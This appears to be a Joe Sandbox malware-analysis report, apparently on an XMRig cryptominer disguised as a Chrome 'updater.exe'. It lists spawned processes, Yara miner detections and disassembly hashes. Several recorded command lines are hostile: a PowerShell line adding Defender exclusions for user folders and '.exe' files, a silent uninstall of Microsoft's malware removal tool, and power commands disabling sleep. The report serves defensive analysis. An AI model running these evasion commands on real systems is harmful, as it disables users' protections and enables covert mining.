                                                                        Start date:14/07/2024
                                                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                        Imagebase:0x7ff72af20000
                                                                        File size:2'870'272 bytes
                                                                        MD5 hash:4471F946569BFA17D68108068D7A17A1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 92%, ReversingLabs
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:29
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:30
                                                                        Start time:17:41:40
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:31
                                                                        Start time:17:41:40
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\lsass.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                        Imagebase:0x7ff654c90000
                                                                        File size:59'456 bytes
                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:32
                                                                        Start time:17:41:41
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:33
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dwm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"dwm.exe"
                                                                        Imagebase:0x7ff79d4a0000
                                                                        File size:94'720 bytes
                                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:34
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff6f0230000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:35
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:36
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:37
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:38
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:39
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:40
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:41
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:42
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:43
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:44
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:45
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:46
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff724960000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:47
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3608696506.00000255463E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000003.2470568560.0000025545E4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3605197071.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000003.3053963293.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:48
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:49
                                                                        Start time:17:41:44
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:50
                                                                        Start time:17:41:44
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:51
                                                                        Start time:17:41:45
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:52
                                                                        Start time:17:41:45
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:53
                                                                        Start time:17:41:46
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wmiadap.exe /F /T /R
                                                                        Imagebase:0x7ff65f200000
                                                                        File size:182'272 bytes
                                                                        MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:54
                                                                        Start time:17:41:47
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:55
                                                                        Start time:17:41:48
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:56
                                                                        Start time:17:41:49
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:57
                                                                        Start time:17:41:50
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:58
                                                                        Start time:17:41:50
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:59
                                                                        Start time:17:41:51
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FF848AD09B2 Relevance: 1.1, Instructions: 1127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ea64be7cb890dbae2147f8213a8049afaeecf6eb33375f751ba3339723900eb1
                                                                          • Instruction ID: 382c1333b84460fd4bfbb0203600b32e18d04d5bddc429c7359b434960a9e0df
                                                                          • Opcode Fuzzy Hash: ea64be7cb890dbae2147f8213a8049afaeecf6eb33375f751ba3339723900eb1
                                                                          • Instruction Fuzzy Hash: 95826E30A1D9098FDB98FB2CD499AA9B7E2FF58744F1041B9D40EC7296DE35EC428B41
                                                                          Function 00007FF848AD06FA Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: =N_^
                                                                          • API String ID: 0-3908133570
                                                                          • Opcode ID: bc0ff6d1db27bc6ac6e32a875bf83ab1688fbcc0064e3ab820b7914b5341747f
                                                                          • Instruction ID: 674b03fc4d35f88ab51e3c897275befda832c0e4d970ddc5771b7f250222d8aa
                                                                          • Opcode Fuzzy Hash: bc0ff6d1db27bc6ac6e32a875bf83ab1688fbcc0064e3ab820b7914b5341747f
                                                                          • Instruction Fuzzy Hash: BD613462D0EA855FE355BA3878162F93BE1EF80264B0841BBC54CC71C3DD68690587D7
                                                                          Function 00007FF848AD2EFE Relevance: .8, Instructions: 794COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73ea0511072df932adf62d374ec4965474167db39c92406ef543eb2457327402
                                                                          • Instruction ID: def878269b1467196b7bf387512578f92c406c54639222f0c78edc98d5b455ab
                                                                          • Opcode Fuzzy Hash: 73ea0511072df932adf62d374ec4965474167db39c92406ef543eb2457327402
                                                                          • Instruction Fuzzy Hash: 3732F871A1DA4A4FEB98EA2C94466B977E2FF98350F140179D40DC32C6EE78EC038B55
                                                                          Function 00007FF848BA390E Relevance: .5, Instructions: 454COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2436627954.00007FF848BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ba0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7e709e1df8d6e3556dcfce0e1b88d3799b018d04f0ca0a635542cc62ffeea32
                                                                          • Instruction ID: 4da92484806ecea73e4feddbb76ef5eb473bbe5f967554c64338d17bebf50181
                                                                          • Opcode Fuzzy Hash: b7e709e1df8d6e3556dcfce0e1b88d3799b018d04f0ca0a635542cc62ffeea32
                                                                          • Instruction Fuzzy Hash: 2DD10221D0EBC55FE75AAB3C58662753FE1EF4A650F0900FBD089C70E3DA18AC498356
                                                                          Function 00007FF848AD831B Relevance: .3, Instructions: 335COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f56a9cb63f724c44a6d4211aa6347961f03cc67852bc5d1a8ece220c8f66f15
                                                                          • Instruction ID: 713f60941643763e5f57e973cfe404539883aa0169b483877a4b455936c9cbb5
                                                                          • Opcode Fuzzy Hash: 2f56a9cb63f724c44a6d4211aa6347961f03cc67852bc5d1a8ece220c8f66f15
                                                                          • Instruction Fuzzy Hash: 37B14D31A1994E8FDF98EF5CC446AADB7E2FF68340F144569D409D7286CB74E881CB82
                                                                          Function 00007FF848AD9AC8 Relevance: .1, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce94373eb96051eede23ddcef17e0ea1e26a90b05987786dcd2363b0ad384e36
                                                                          • Instruction ID: eda5cc8928db942dd547b0a818a51074e40909c81bf68865c283702e9bebb7a7
                                                                          • Opcode Fuzzy Hash: ce94373eb96051eede23ddcef17e0ea1e26a90b05987786dcd2363b0ad384e36
                                                                          • Instruction Fuzzy Hash: 5841E37190DB884FCB0ADB5CEC566E97FE0EB56310F04429FE049C32A2DA61A955CBD3
                                                                          Function 00007FF8489BF020 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434055205.00007FF8489BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489BD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff8489bd000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e0b33a4725893dc69e9043e04923637bbbb0a36d9901d58fe7fd8a4e19f400e1
                                                                          • Instruction ID: 3cdc0777b484c4c2ef2b384899e174f9dd84b4560f3427f242e58b99cf023137
                                                                          • Opcode Fuzzy Hash: e0b33a4725893dc69e9043e04923637bbbb0a36d9901d58fe7fd8a4e19f400e1
                                                                          • Instruction Fuzzy Hash: 5C41F27180DBC44FD7569B38A845A523FF0FF52360F1506EFD088CB1A7DA25A846C7A2
                                                                          Function 00007FF848AD2E27 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0f3628859ec9690b7bb3b316a2ba7ecb9b186b8d8d717f1c3fff11471482c1a0
                                                                          • Instruction ID: f860998331cd77f2983616cefb1ddc372348487a9ded52350ef057b05b94574a
                                                                          • Opcode Fuzzy Hash: 0f3628859ec9690b7bb3b316a2ba7ecb9b186b8d8d717f1c3fff11471482c1a0
                                                                          • Instruction Fuzzy Hash: EC212722B0D5490FE780FA2CA8556F677D1EFD5365F0401BBE58CC7293EE589C428395
                                                                          Function 00007FF848AD1591 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dde66b0294f36b2d7634250727897470e7930e5e3e3b2384a8c8944e079c896f
                                                                          • Instruction ID: 41256067a67bbab6eea0bfcea81a3c4468105862b8408999e94eef81c12fdb57
                                                                          • Opcode Fuzzy Hash: dde66b0294f36b2d7634250727897470e7930e5e3e3b2384a8c8944e079c896f
                                                                          • Instruction Fuzzy Hash: DF31B16080EBC24FE3239B3488657417FA09F43268F1D06DEC0C18A5E7D7EDA48AC312
                                                                          Function 00007FF848BA3A4D Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2436627954.00007FF848BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ba0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d940d7c138395d699b33fbfaa5f0d9375672f2df35293a973771acad7f5304ac
                                                                          • Instruction ID: 7fb154ba7625b6183de653fa7060366b25aab1d1574e0dd1e9cdcae1782ccbf2
                                                                          • Opcode Fuzzy Hash: d940d7c138395d699b33fbfaa5f0d9375672f2df35293a973771acad7f5304ac
                                                                          • Instruction Fuzzy Hash: 0D11B131E1EF575FE798AA6C985617872E2EF49291F5800BED00DC35E2DF29E8458208
                                                                          Function 00007FF848ADA491 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47464642547a1ec62d0dd5d86b3f5f0136acdcb2c80108e9c156ac838bef5172
                                                                          • Instruction ID: c3f2f7c264d02c91189a97c3addbdeed4c2ec4e594a956794e65f27685fa4c98
